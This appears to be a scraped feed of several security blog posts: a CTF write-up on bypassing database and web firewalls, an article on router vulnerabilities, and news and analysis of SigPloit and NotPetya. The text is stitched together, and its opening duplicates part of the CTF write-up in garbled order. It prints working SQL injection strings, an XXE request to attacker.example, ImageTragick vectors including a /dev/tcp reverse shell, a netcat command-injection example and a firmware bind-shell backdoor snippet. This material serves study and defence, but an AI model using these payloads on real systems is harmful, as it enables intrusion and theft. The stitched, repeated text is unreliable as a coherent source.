INSERT INTO notes SELECT 1,2,3 FROM notes,flags as a ON DUPLICATE KEY UPDATE body = flag
Here participants needed to find and exploit a vulnerability in an old version of Adobe BlazeDS. The application used AMF (Action Message Format) for communicating with the server. AMF is a serialized structure with typed fields. One type is XML (0x0b), incorrect parsing of which caused a number of vulnerabilities in libraries for handling AMF, including in BlazeDS.
WAF had a built-in AMF parser, but parsing of external Flex objects— AcknowledgeMessageExt (alias DSK), CommandMessageExt (DSC), AsyncMessageExt (DSA)—was disabled for this challenge. At the same time, BlazeDS could parse such messages and find XML in them, which led to a vulnerability to XXE attacks.
The following request could be created using the pyamf library:
import pyamf
import httplib
import uuid
from pyamf.flex.messaging import RemotingMessage, AcknowledgeMessageExt
from pyamf.remoting import Envelope, Request, decode
hostname = 'task3.waf-bypass.phdays.com'
port = 80
path = '/samples/messagebroker/amf'
request = AcknowledgeMessageExt(
operation="findEmployeesByName",
destination="runtime-employee-ro",
messageId=None,
body=[
'
' ]>'
'External entity 1: &foo; '],
clientId=None,
headers={'DSId': str(uuid.uuid4()).upper(),
'DSEndpoint': 'my-amf'}
)
envelope = Envelope(amfVersion=3)
envelope["/%d" % 1] = Request(u'null', [request])
message = pyamf.remoting.encode(envelope)
conn = httplib.HTTPConnection(hostname, port)
conn.request('POST', path, message.getvalue(),
headers={'Content-Type': 'application/x-amf'})
resp = conn.getresponse()
data = resp.read()
content = decode(data)
print content
BlazeDS was configured to operate via an internal transparent proxy, which added a flag to the header of all outgoing requests.
For this challenge, we used a version of web application Pasteboard that was vulnerable to the Imagetragick attack. WAF was specially configured to filter only the following keywords:
url, caption:, label:, ephemeral:, msl:
However, less-common vectors were still available. One for example, was the text wrapper (unlike label, no @ is required before the file name):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'text:/etc/passwd'
pop graphic-context
The result was an image with the contents of the /etc/passwd file:
Arseny Sharoglazov used a vector with image over:
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
In the imagemagick source code, Sergey Bobrov found a pango: wrapper not previously mentioned in public exploits.
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'pango:@/etc/passwd'
pop graphic-context
Participants were given a search form vulnerable to SQL injection. The table with search results contained the publickey field. The challenge was to use SQL injection to get the value of the privatekey field. The following ABAC policy, written in ALFAScript, was used:
namespace example {
export policy Main {
target clause action == "select"
apply denyUnlessPermit
rule r1 {
permit
target clause resource.schema.id == "information_schema"
}
rule r2 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "publickey"
}
rule r3 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "name"
}
}
}
Note use of the word denyUnlessPermit. In XACML, there are several types of algorithms for combining elements to describe attribute-based access control policies. Use of the denyUnlessPermit algorithm means that the query will be authorized if and only if at least one of the rules allows granting user access to the resource. The DBFW does not know the real structure of the database, so when it sees a query of the type SELECT a,b from c,d, unlike the database it does not know where column a is located (in table c or table d). In case of such a query, the DBFW must check the user's ability to access all versions of resources. In this example, that would be columns c.a, c.b, d.a, and d.b. So if a query contains at least one authorized column, we can use two tables to extract privatekey:
Petrov' union select name, privatekey from information_schema.columns,users where name = 'Petrov' –
This web application had two functions: loading of CSV files with contact lists and a form for searching contacts, which was vulnerable to SQL injection. A special Dejector mechanism was used by the DBFW for protection.
This method for detecting SQL injection was first detailed by Hansen and Patterson in "Guns and Butter: Towards Formal Axioms of Input Validation". In essence, a set of known web application requests (for example, this set could be obtained using static source-code analysis) is used to build an SQL subgrammar. This grammar is used to generate a parser. If a query is recognized by the parser, this mean that the query belongs to that language; otherwise the query does not belong to the language and is therefore not legitimate.
For this challenge, we prepared a grammar describing the allowed queries. The ability to load CSV files implied that the MySQL user had file operations available. Another hint was in an error: mysqli_multi_query(), enabling stacked queries, was used. The ordinary LOAD_FILE() was forbidden by the grammar but LOAD DATA INFILE was accessible:
'; load data infile '/etc/passwd' into table users character set 'utf8
First and second place were taken by Sergey Bobrov and Arseny Sharoglazov, both from Kaspersky Lab. Third place went to Andrey Semakin, a student at Tyumen State University. Great work!
Arseny Reutov, Dmitry Nagibin, Igor Kanygin, Denis Kolegov, Nikolay Tkachenko, Ivan Khudyashov
Challenge #1 (JJ)
350 points
For this challenge, participants had to find a way around detection of SQL injections. A PHP module, which replaces the original mysql_query() function with one of its own, was installed on the application server. This function adds the values of the HTTP parameters (GET, POST, Cookie) to the start of the SQL query in the form of a comment.
When the application sends the SQL query to the database, the query is intercepted by the DBFW. The DBFW extracts the values of the HTTP parameters from the comment and looks for them in the SQL query. If a substring matching a parameter value is found, it is replaced with a constant. Then the two queries are tokenized: the one before replacement and the one after. If the token counts do not match, this indicates SQL injection. The underlying principle is that the clearest sign of an injection attack is a change in the parsing tree: if the number of tokens has changed, the parsing tree has changed, which means injection has occurred.
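The detection step can be sketched in a few lines of Python. This is a simplified illustration of the described algorithm, not the DBFW's actual code: the regex tokenizer below stands in for a real MySQL lexer.

```python
import re

# Crude SQL tokenizer: quoted strings, numbers, identifiers, punctuation.
# A real DBFW would use a full MySQL lexer (e.g. generated from a grammar).
TOKEN_RE = re.compile(r"'[^']*'|\d+|\w+|[^\s\w]")

def tokenize(query):
    return TOKEN_RE.findall(query)

def is_injection(query, param_value):
    # Replace the user-supplied value with a constant and compare token counts
    normalized = query.replace(param_value, "0")
    return len(tokenize(query)) != len(tokenize(normalized))

# A benign numeric parameter leaves the token count unchanged:
print(is_injection("SELECT * FROM posts WHERE p = 42", "42"))            # False
# A UNION-based injection adds tokens, so the counts differ:
print(is_injection(
    "SELECT * FROM posts WHERE p = -1 union select flag from flags",
    "-1 union select flag from flags"))                                  # True
```

The bypass described below works precisely because this check compares only the number of tokens, not what the tokens are.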
We covered the logic of this algorithm in more detail in the talk "Database Firewall from Scratch", in which we shared our experience researching DBFW mechanisms. Those who saw the talk know the main drawback of this approach: comparing token counts is not a 100% reliable method, since it is possible to alter the parsing tree in such a way that the token counts of the original and analyzed queries still match. An attacker can add comments so that the number of tokens in the two queries is the same even though the tokens themselves differ. The correct approach is to build and compare the abstract syntax trees (ASTs) of the two queries. So to complete this challenge, participants needed to craft a vector with the same number of tokens as the original, injection-free query:
/post.php?p=-1 union select 1,2,(select flag from flags order by id,1),4 -- -
Participants found a flaw in our ANTLR parser for MySQL. The reason is that MySQL supports conditional comments using the notation /*! … */. Everything inside such a comment will be run by MySQL, but other databases will ignore it.
http://task1.waf-bypass.phdays.com/post.php?p=(select /*!50718 ST_LatFromGeoHash((SELECT table_name FROm information_schema.tables LIMIT 1)) */) and true and true and true order by id desc limit 10 -- (Arseny Sharoglazov)
http://task1.waf-bypass.phdays.com/post.php?p=/*!1111111 union select 1 id,flag,1,1 from flags where 1*/ (Sergey Bobrov)
Challenge #2 (KM)
250 points
For the second challenge, participants had access to an application that allowed adding notes. The full SQL query was passed, hex-encoded, in the q parameter:
http://task2.waf-bypass.phdays.com/notes.php?q=53454c454354207469746c652c20626f64792046524f4d206e6f746573204c494d4954203235 (SELECT title, body FROM notes LIMIT 25 )
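Decoding the hex value from the URL above confirms the query it carries; this is plain standard-library Python, nothing challenge-specific is assumed:

```python
# The q parameter from the challenge URL, hex-encoded
q = "53454c454354207469746c652c20626f64792046524f4d206e6f746573204c494d4954203235"

# Decode the hex string back into the raw SQL query
query = bytes.fromhex(q).decode("ascii")
print(query)  # SELECT title, body FROM notes LIMIT 25
```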
Using the ALFAScript language, we set an attribute-based access control (ABAC) policy allowing users to perform only INSERT, UPDATE, and SELECT queries, and only on the notes table. Access to the flags table was therefore blocked. But we left a way around this restriction by allowing CREATE. Our intended solution involved creating an event (https://dev.mysql.com/doc/refman/5.7/en/create-event.html) that writes a flag to the notes table:
CREATE EVENT `new_event` ON SCHEDULE EVERY 60 SECOND STARTS CURRENT_TIMESTAMP ON COMPLETION NOT PRESERVE ENABLE COMMENT '' DO insert into notes (title, body) VALUES ((select flag from flags limit 1), 2)
Besides CREATE EVENT, participants could use CREATE TABLE to get a flag in a MySQL message after first causing an error (solution by Arseny Sharoglazov):
CREATE TABLE ggg AS SELECT ST_LongFromGeoHash (flag) FROM flags;
Sergey Bobrov proposed an alternative method using ON DUPLICATE KEY UPDATE, which enables running UPDATE inside INSERT with a single query:
INSERT INTO notes SELECT 1,2,3 FROM notes,flags as a ON DUPLICATE KEY UPDATE body = flag
Challenge #3 (AG)
300 points
Here participants needed to find and exploit a vulnerability in an old version of Adobe BlazeDS. The application used AMF (Action Message Format) for communicating with the server. AMF is a serialized structure with typed fields. One of the types is XML (0x0b), and incorrect parsing of it caused a number of vulnerabilities in libraries for handling AMF, including in BlazeDS.
The WAF had a built-in AMF parser, but parsing of external Flex objects (AcknowledgeMessageExt, alias DSK; CommandMessageExt, DSC; AsyncMessageExt, DSA) was disabled for this challenge. At the same time, BlazeDS could parse such messages and find XML in them, which left it vulnerable to XXE attacks.
The following request could be created using the pyamf library:
import pyamf
import httplib
import uuid
from pyamf.flex.messaging import RemotingMessage, AcknowledgeMessageExt
from pyamf.remoting import Envelope, Request, decode
hostname = 'task3.waf-bypass.phdays.com'
port = 80
path = '/samples/messagebroker/amf'
request = AcknowledgeMessageExt(
operation="findEmployeesByName",
destination="runtime-employee-ro",
messageId=None,
body=[
    # XXE payload. The XML markup was stripped from the original post,
    # so the DOCTYPE below is a reconstruction; the entity URL is a placeholder.
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE x ['
    '<!ENTITY foo SYSTEM "http://attacker.example/">'
    ' ]>'
    '<x>External entity 1: &foo;</x>'],
clientId=None,
headers={'DSId': str(uuid.uuid4()).upper(),
'DSEndpoint': 'my-amf'}
)
envelope = Envelope(amfVersion=3)
envelope["/%d" % 1] = Request(u'null', [request])
message = pyamf.remoting.encode(envelope)
conn = httplib.HTTPConnection(hostname, port)
conn.request('POST', path, message.getvalue(),
headers={'Content-Type': 'application/x-amf'})
resp = conn.getresponse()
data = resp.read()
content = decode(data)
print content
BlazeDS was configured to operate via an internal transparent proxy, which added a flag to the header of all outgoing requests.
Challenge #4 (KP)
200 points
For this challenge, we used a version of the Pasteboard web application that was vulnerable to the ImageTragick attack. The WAF was specially configured to filter only the following keywords:
url, caption:, label:, ephemeral:, msl:
However, less-common vectors were still available. One, for example, was the text wrapper (unlike label, no @ is required before the file name):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'text:/etc/passwd'
pop graphic-context
The result was an image with the contents of the /etc/passwd file.
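The gap in the filter is easy to see if you model it as the naive substring blacklist it effectively was (our reconstruction of the idea, not the WAF's actual code):

```python
# The only keywords the WAF filtered in this challenge
BLOCKED = ["url", "caption:", "label:", "ephemeral:", "msl:"]

def waf_blocks(mvg_payload):
    payload = mvg_payload.lower()
    return any(keyword in payload for keyword in BLOCKED)

# A label: payload is caught by the blacklist:
print(waf_blocks("image over 0,0 0,0 'label:@/etc/passwd'"))  # True
# The text: wrapper is not on the list, so the payload sails through:
print(waf_blocks("image over 0,0 0,0 'text:/etc/passwd'"))    # False
```

Blacklisting a handful of coder names can never keep up with ImageMagick's full list of coders, as the pango: vector below also shows.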
Arseny Sharoglazov used a vector with image over:
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
In the ImageMagick source code, Sergey Bobrov found a pango: wrapper not previously mentioned in public exploits:
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'pango:@/etc/passwd'
pop graphic-context
Challenge #5 (GM)
250 points
Participants were given a search form vulnerable to SQL injection. The table with search results contained the publickey field. The challenge was to use SQL injection to get the value of the privatekey field. The following ABAC policy, written in ALFAScript, was used:
namespace example {
export policy Main {
target clause action == "select"
apply denyUnlessPermit
rule r1 {
permit
target clause resource.schema.id == "information_schema"
}
rule r2 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "publickey"
}
rule r3 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "name"
}
}
}
Note the use of denyUnlessPermit. XACML defines several combining algorithms for the rules that make up an attribute-based access control policy. With denyUnlessPermit, a query is authorized if and only if at least one rule permits the user's access to the resource. The DBFW does not know the real structure of the database, so when it sees a query such as SELECT a,b FROM c,d, it (unlike the database) cannot tell whether column a belongs to table c or table d. For such a query, the DBFW must check the user's access to every possible interpretation of each resource: in this example, columns c.a, c.b, d.a, and d.b. So if a query contains at least one authorized column, we can use two tables to extract privatekey:
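The over-approximation described above can be modeled in a few lines. This is our own simplified sketch of the policy and the firewall's column-resolution logic; the triple encoding and function names are ours, not the DBFW's API:

```python
# Permit rules from the ALFAScript policy above, as (schema, table, column)
# triples; None means "any value" (rule r1 permits all of information_schema).
PERMITS = [
    ("information_schema", None, None),   # r1
    ("task5", "users", "publickey"),      # r2
    ("task5", "users", "name"),           # r3
]

def rule_permits(rule, schema, table, column):
    return all(r is None or r == v
               for r, v in zip(rule, (schema, table, column)))

def query_authorized(tables, columns):
    """tables: list of (schema, table) pairs; columns: bare column names.
    The DBFW cannot tell which table a column comes from, so under
    deny-unless-permit it accepts a column if ANY interpretation is permitted."""
    for col in columns:
        if not any(rule_permits(rule, schema, table, col)
                   for rule in PERMITS
                   for schema, table in tables):
            return False
    return True

# privatekey on task5.users alone is denied by every rule:
print(query_authorized([("task5", "users")], ["name", "privatekey"]))  # False
# ...but joining information_schema.columns gives privatekey a permitted
# interpretation via rule r1, so the whole query is authorized:
print(query_authorized([("task5", "users"),
                        ("information_schema", "columns")],
                       ["name", "privatekey"]))                        # True
```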
Petrov' union select name, privatekey from information_schema.columns,users where name = 'Petrov' –
Challenge #6 (ES)
300 points
This web application had two functions: uploading CSV files with contact lists, and a contact search form that was vulnerable to SQL injection. For protection, the DBFW used a special mechanism called Dejector.
This method for detecting SQL injection was first detailed by Hansen and Patterson in "Guns and Butter: Towards Formal Axioms of Input Validation". In essence, a set of known web application queries (which could be obtained, for example, by static source-code analysis) is used to build an SQL subgrammar, and a parser is generated from that grammar. If the parser recognizes a query, the query belongs to the language of legitimate queries; otherwise it does not, and is therefore not legitimate.
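A toy illustration of the Dejector idea (our own sketch, not the challenge's actual mechanism): the legitimate queries define a tiny language, recognized here by a regular expression standing in for a generated parser, and anything outside that language is rejected:

```python
import re

# Toy subgrammar: the only legitimate query shape is a contact search
# with a quoted literal. A real Dejector implementation generates a
# parser from a full SQL grammar restricted to the known queries.
ALLOWED = re.compile(
    r"^SELECT name, phone FROM contacts WHERE name = '[^']*'$")

def is_legitimate(query):
    return ALLOWED.match(query) is not None

# A query from the known set is accepted:
print(is_legitimate("SELECT name, phone FROM contacts WHERE name = 'Ivanov'"))
# A stacked query falls outside the subgrammar and is rejected:
print(is_legitimate(
    "SELECT name, phone FROM contacts WHERE name = ''; "
    "load data infile '/etc/passwd' into table users"))
```

The approach is only as good as the grammar: as the solution below shows, the bypass came from a statement shape the grammar still allowed, not from defeating the parser.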
For this challenge, we prepared a grammar describing the allowed queries. The ability to upload CSV files implied that the MySQL user could perform file operations. Another hint was in an error message: the application used mysqli_multi_query(), which enables stacked queries. The ordinary LOAD_FILE() was forbidden by the grammar, but LOAD DATA INFILE was accessible:
'; load data infile '/etc/passwd' into table users character set 'utf8
Winners
First and second place were taken by Sergey Bobrov and Arseny Sharoglazov, both from Kaspersky Lab. Third place went to Andrey Semakin, a student at Tyumen State University. Great work!
Arseny Reutov, Dmitry Nagibin, Igor Kanygin, Denis Kolegov, Nikolay Tkachenko, Ivan Khudyashov
↧
Practical ways to misuse a router
Wi-Fi and 3G routers are all around us. Yet in just one recent month, approximately 10 root shell and administrator account vulnerabilities in home internet devices came to light. And access to tens of millions of IoT devices—routers, webcams, and other gadgets—is available to anyone willing to pay $50 for a shodan.io paid account.
At the same time, developers and vendors of these devices tend to have other priorities than "testing" and "security." Many serious vulnerabilities remain unpatched, and even when patches are released, users are slow to install them. What does this leave us with? Legions of vulnerable devices, lying low until hacked and pressed into service as part of a DDoS botnet.
What's changed?
The Mirai botnet burst onto the world scene in August 2016. MalwareMustDie researchers started to study the malicious network activity of IoT devices in early August, and by September 20, the botnet had grown to approximately 150,000 devices (primarily DVRs and IP cameras) and attacked Minecraft servers hosted by French provider OVH.
IoT devices were infected via attacks on Telnet ports 23 and 2323 using a list of 62 factory-default passwords. Target IP addresses were generated at random across the entire address space; after joining the network, each infected device began scanning these random addresses itself. The botnet code was not stored in persistent memory and therefore did not survive a restart of the infected device. But given the speed at which the bots scanned the internet, a previously infected device would soon rejoin the botnet after a restart anyway.
This was followed by massive DDoS attacks on journalist Brian Krebs, DynDNS, Liberia, Deutsche Telekom, and a U.S. college. The Mirai source code was published in early October. The attack on Deutsche Telekom two months later used a modified version of Mirai that exploited a vulnerability in the RomPager server on port 7547 (CWMP protocol).
As claimed by the person who published the Mirai code, the botnet encompassed 380,000 devices simultaneously. The sheer scale of infection was made possible by negligence, of course—externally accessible Telnet and the failure to require non-factory-set passwords were key enablers of the botnet's growth.
More than just cameras
Attempts to fight back against these attacks are slowly but surely reducing the number of compromised devices with non-unique passwords. Attackers' methods are changing from password-guessing to exploitation of various vulnerabilities.
Mirai preyed primarily on video cameras and other IoT devices on which Telnet gives access to Linux commands; on routers, by contrast, Telnet gives access only to the command-line interface (CLI) for configuration. The CLI allows reading and modifying the device configuration, DNS settings, IP routing, and system information, which is already enough for some attacks, but not enough to install software for remote control.
Here is what we'll charitably call "cute" protection from bots that can be found on port 23 of some routers:
But the absence of bash terminals does not mean that other attack vectors are absent.
So what is your run-of-the-mill home router? It's a package containing:
- Externally accessible web panel with a flashy design
- Read-only squashfs file system and ~10 MB of flash memory
- Busybox (compact UNIX command-line interface with utilities), almost inevitably
- micro http web server, DropBear SSH server
- Open ports: 80, 443, 23, 22, 21, 137
The average age of device firmware is 3–4 years. This correlates with the average age of the routers themselves: users buy new routers sooner than they update the firmware on their existing ones. Recently there has been an encouraging trend toward improvement, thanks to providers that can remotely (and without user intervention) diagnose, configure, and roll out updates to user routers. One limitation, though, is that this works only for devices sold under the providers' own brands.
Based on field experience, passwords for approximately 15 out of 100 devices have never been changed from their default values. And just the five most popular user name/password pairs are enough to get admin access to 1 out of every 10 devices:
Having obtained access to a web panel, an attacker can make life difficult for all of the network users, perform DNS spoofing, and probe the internal network. If lucky, the attacker can also run ping or traceroute from the web panel, find vulnerabilities in the web server code in order to obtain shell access, or use an already-found vulnerability.
The diversity and simplicity of the vulnerabilities in router software (not to mention the number of bug reports) is a clear sign that device functionality is rarely subjected to rigorous testing, and that developers lack the know-how to create secure software. Development does not take intruder models into account. Buyers can walk out of a store today with a router containing one of the following vulnerabilities:
● NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' RCE (link). Due to insufficient checks in ping.cgi, user-entered IP addresses are piped directly into bash. Therefore, arbitrary commands can be run in the terminal by appending these commands in the IP address field of a POST request. For example: 12.12.12.12; nc -l 4444 -e /bin/bash. Of course, "nc" can be turned into a more powerful payload, such as msfvenom. 3,000 devices are awaiting their hour of reckoning. Exploiting this vulnerability requires authorization in the web interface.
● Multiple vulnerabilities in GoAhead WIFICAM cameras (link). A number of vulnerabilities were found in over 1,250 models of IP cameras, placing approximately 150,000 cameras at risk. An error in implementation of a custom authorization mechanism allows obtaining the administrator password; in addition, an OS Command Injection vulnerability in set_ftp.cgi allows running any and all terminal commands. Together, these give full unrestricted control over the device. Yikes!
This vulnerability was added to the arsenal of TheMoon, a botnet first spotted in 2014. Research identified infected cameras on which the settings.ini file had been modified to contain a script that loads malicious code from the attacker's server when the device starts.
A series of downloads from the attacker's server is concluded with an ARM-compiled executable:
which is identified by 18 out of 57 antivirus products as Linux/Proxy.
● Linksys Smart Wi-Fi Vulnerabilities (link). Security analysis of 25 popular Linksys Smart Wi-Fi routers sold worldwide led to identification of 10 vulnerabilities of various types and danger levels. Some of the vulnerabilities allow running arbitrary commands with root privileges. Although Shodan shows only a total of 1,000 such devices, researchers have described scanning over 7,000 devices.
● Siklu EtherHaul Unauthenticated Remote Command Execution Vulnerability (link: http://seclists.org/fulldisclosure/2017/Feb/53). These high-end millimeter wave radios from Siklu provide subscriber connectivity at 70/80 GHz. A researcher found that the mysterious port 555 is used to communicate with other Siklu EH devices. But since access to the port is not restricted and passwords are stored in cleartext, the researcher was able to build an exploit that changes the administrator password. This architecture-level defect was assigned a CVE number: CVE-2017-7318.
● Bypassing Authentication on iBall Baton Routers (link). Although the administrator interface for the iBall Baton 150M is secured by HTTP authorization, anyone at all can view password.cgi. It would seem that the developers forgot about this fact and stored passwords for all three of the device accounts in cleartext in a script on an HTML page. 2,500 administrator passwords are out there for the taking!
These examples all come from just one month. More thorough compendiums of router-related vulnerabilities are available from routersecurity.org and as part of the excellent routersploit framework, which collect dozens of vulnerabilities and exploits in convenient form.
To summarize: An enormous number of holes in web administration code make it possible to obtain passwords and run arbitrary code.
Other threat vectors
Besides a web interface, the average router has four to five ports open, including Telnet (23), SSH (22), and FTP (21).
In practice, Telnet gives access to the CLI for router settings and FTP enables updating router firmware remotely. For instance, on 18,000 D-Link DSL 2750U modems, anyone bruteforcing accounts can install firmware with a built-in backdoor. So an attacker can take control in a way that is resistant to restarting and unlikely to be reversed by another attacker. Here is what that attacker would do:
- Download device firmware from the device manufacturer (D-Link).
- Extract the firmware archive.
- Alter the firmware by adding a backdoor account or script that runs bind shell. Here the attacker can use a bit of imagination when choosing one of the many methods for getting shell access.
- Reassemble this franken-firmware. Tools for this purpose include the firmware framework.
- Update the device firmware via FTP.
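Step 3 of the scheme above, altering the extracted filesystem, can be as small as one appended line. This is a hypothetical sketch: the etc/rc.local path and the busybox bind-shell command are illustrative only, and the real layout depends on the firmware.

```python
import os
import tempfile

# Hypothetical layout: a startup script inside the extracted squashfs root.
# Real firmware images differ; paths and commands here are illustrative.
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, "etc"))
rc_path = os.path.join(root, "etc", "rc.local")

# The startup script as it came out of the original firmware image
with open(rc_path, "w") as f:
    f.write("#!/bin/sh\n/usr/sbin/httpd &\n")

# Inject the backdoor: a busybox bind shell started on every boot
with open(rc_path, "a") as f:
    f.write("busybox nc -ll -p 4444 -e /bin/sh &\n")

print(open(rc_path).read())
```

Because the backdoor lives in the flashed image rather than in RAM, it survives reboots, unlike a Mirai-style infection.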
Besides FTP, D-Link devices can also be updated via Telnet (160,000 CLIs available) or web panel. Compared to this, the DNS Hijack threat looks like peanuts!
Recent attacks on Eir D1000 devices involved an OS Command Injection vulnerability in the TR-064 implementation of CWMP. This resulted in infection of around 900,000 devices with a modified version of Mirai. Another vulnerability in RomPager server versions prior to 4.34, dubbed Misfortune Cookie (CVE-2014-9222), has a maximum CVSS 10 rating.
Meanwhile, just under half of all CWMP-enabled devices use the vulnerable RomPager 4.07. That's almost 3,300,000 internet-accessible devices. At RSA 2017, Check Point presented research on security issues with TR-064.
RomPager 4.07 is far from the only out-of-date service used by firmware developers. Genivia gSOAP 2.7 was released in 2004, while DropBear SSH 0.46 saw the light of day in 2005, yet both can be found on devices today.
Multiple vulnerabilities (DoS and Authenticated RCE) are known for DropBear.
On April 4, researchers Bertin Jose and Fernandez Ezequiel published a report on an SNMP agent issue affecting 18 vendors, 78 models, and over half a million devices. Anyone can obtain full read/write access to all values due to this bug. The SNMP agent simply fails to check the community string: any combination is accepted for authorization. Bearing the fashionable name of StringBleed, this vulnerability primarily affects cable modems although the researchers have found a similar vulnerability on other devices. The consequences are the same as if there were no authorization at all.
Last but not least, 9 out of 1,000 routers provide a free DNS server with recursion enabled by default. Exploitation of this feature is a long-known technique and will continue until router DNS stops responding to internet-originated queries by default.
Conclusion
Manufacturers of connected home devices are gradually closing off the most commonplace methods for botnet infection. Instead of simple brute-forcing, attackers have shifted their efforts to exploiting vulnerabilities, which give substantially better results. Non-stop scanning of the entire range of IP addresses enables attackers to find all vulnerable devices. A huge number of device models have vulnerabilities; some are specific to a certain model, while others affect hundreds of thousands or millions of devices, turning them into a pliable toy in the hands of an attacker. Methods for fighting botnet infection are simple. Starting with the most important ones, they are:
- Restricting access by default from the internet to the administration panel, CLI, and FTP.
- Using the latest firmware versions.
- Requiring customers to use strong passwords.
- Limiting brute-force attempts.
The most popular devices are—because of their popularity—the most interesting for both attackers and researchers. Until security becomes a serious priority, rushed and incomplete development cycles will continue to result in vulnerable router software.
Author: Kirill Shipulin, Positive Technologies
↧
↧
SigPloit framework published: telecom vulnerability testing of SS7, GTP, Diameter, and SIP made easy
Code for the open-source SigPloit framework has been published on GitHub by security researcher Loay Abdelrazek. SigPloit is a convenient framework for testing for vulnerabilities in telecommunication protocols. We cannot state that this project will have a big effect on the security situation, but it is definitely one of the alarm bells that should be noted by the telecom industry.
What SigPloit does
As described on GitHub, SigPloit is a framework intended for telecom security specialists. Researchers can use SigPloit for penetration testing of telecom networks in order to find known vulnerabilities in signaling protocols. The stated purpose of the framework is security testing of all existing protocols used in telecom operators' infrastructure, including SS7, GTP (3G), Diameter (4G), and even SIP for IMS and VoLTE, which is used at the access level and for encapsulating SS7 messages in SIP-T. According to the documentation, SigPloit uses testing results to provide network-specific recommendations on how to improve security.
Consequences for telecom security
Telecom protocols often rely on "security through obscurity." In practice, security measures are often inadequate, but such issues are contained due to the small number of security researchers conversant in these niche protocols and infrastructures. Tools like SigPloit may well change this, and can be easily modified to implement the full range of SS7 attacks.
Such publicly available pentesting tools dramatically reduce the barrier to entry for those interested in telecom security—both white hats and black hats. Attacks on operator infrastructure will become the province not only of experienced industry specialists, but even novices with basic knowledge of Linux, programming and networks.
If telecom operators fail to prioritize security, telecom users and their privacy will lose out.
Positive Technologies researchers have repeatedly raised the alarm about vulnerabilities in the SS7 signaling protocol. These attacks have long passed from the "proof of concept" stage to real threats that are being used against users in the wild. SS7 vulnerabilities have already been used to steal from user bank accounts as well as hack Telegram accounts.
Please refer to our latest research papers to stay up to date with the latest trends:
↧
The new malware that broke out today is slightly similar to Petya ransomware known since 2016
Positive Technologies experts are still analyzing the malware sample and gathering additional data, in particular information on the mechanism of its intrusion into a network. But even at this point it is obviously not just a new version of WannaCry. This ransomware combines hacking techniques, such as standard system administration utilities and tools for obtaining operating system passwords. This ensures fast spread of the malware within the network and causes a large-scale epidemic if even one computer is infected. As a result, infected computers are rendered inoperable and their data are encrypted.
According to preliminary data, we can confirm that this malware is somewhat similar to Petya, ransomware known since 2016 that also caused PCs to crash.
The root of the current problem is, once again, information security negligence. In short, the affected organizations did not learn their lessons after WannaCry. First of all, updates are not installed in time. According to Positive Technologies, 20% of systems have critical vulnerabilities associated with the lack of security updates. The average age of the most obsolete updates is 9 years, and the oldest discovered vulnerability was published more than 17 years ago.
The general level of staff awareness of information security is low. There are still cases when employees download attachments or follow links received from untrusted sources.
Another problem is that information systems are often configured incorrectly in terms of architecture.
It is harder to defend against this threat than against WannaCry, since it also spreads using stolen legitimate credentials. To counter it, we recommend that organizations install security updates on time, implement information security monitoring, and perform regular security audits.
↧
#NotPetya and #Petya compared: any hope for decrypting files?
Positive Technologies expert Dmitry Sklyarov provides here his comparison of NotPetya ransomware, which attacked companies this week, with a sample of Petya from 2016. Is decryption of ransomed files possible? And what does the code tell us about the malware's creation?
This post considers the portions of the two viruses responsible for MFT encryption. This encryption runs when the ransomware has administrator rights.
What NotPetya does
At the moment of infection (while Windows is still running), the virus writes code to the start of the disk. This code will be run after restart. The virus writes its configuration, verification data, and original MBR to certain sectors.
Let's start by looking at disk sector 0x20, which is something like a machine-specific configuration. During an infection, the following values are written to sector 0x20:
- Indicator that the MFT is not encrypted (value 0)
- EncryptionKey (random sequence 32 bytes long)
- Nonce (random sequence 8 bytes long)
- Personal Installation Key (random sequence of 60 characters from the following alphabet: 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz)
Random data is generated by the CryptGenRandom function, which is believed to be cryptographically strong.
512 bytes with the value 0x07 are written to sector 0x21.
A version of the original MBR, in which every byte has been XOR’ed with the value 0x07, is written to sector 0x22.
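Since XOR with a constant byte is its own inverse, this obfuscation is trivially reversible. A minimal sketch (illustrative code, not the malware's own):

```python
def xor_with_07(data: bytes) -> bytes:
    # XOR every byte with 0x07; applying the function a second time
    # restores the original bytes.
    return bytes(b ^ 0x07 for b in data)
```

Running the same function over sector 0x22 again would yield the original MBR.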
After the initial restart, the MFT is encrypted. Before this happens:
- Sector 0x20 is read
- MFT encryption indicator is set (value 1)
- EncryptionKey is copied to a temporary buffer
- The field with EncryptionKey is overwritten with null bytes
- Sector 0x20 is written to disk
- Sector 0x21 (all 0x07) is read
- Contents of that sector are encrypted using EncryptionKey + Nonce
- Sector 0x21 is written to disk
Then the MFT sectors are encrypted with the same EncryptionKey + Nonce. The code of the encryption algorithm strongly resembles the Salsa20 algorithm, but there are some differences. Instead of the constant "expand 32-byte k," the constant "-1nvalid s3ct-id" is used. So far I have not been able to repeat the results of encryption with a known key. Possibly the authors have made an error somewhere, which would seem to be confirmed by this post: https://twitter.com/kryptoslogic/status/880058211516260352
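For reference, the standard Salsa20 block function can be sketched in pure Python. Swapping the sigma constant "expand 32-byte k" for "-1nvalid s3ct-id" reproduces the kind of modification described above; this is an illustrative implementation of textbook Salsa20, not the malware's exact code:

```python
import struct

def rotl32(x, n):
    # 32-bit left rotation
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def quarter(y0, y1, y2, y3):
    # Salsa20 quarterround
    y1 ^= rotl32((y0 + y3) & 0xFFFFFFFF, 7)
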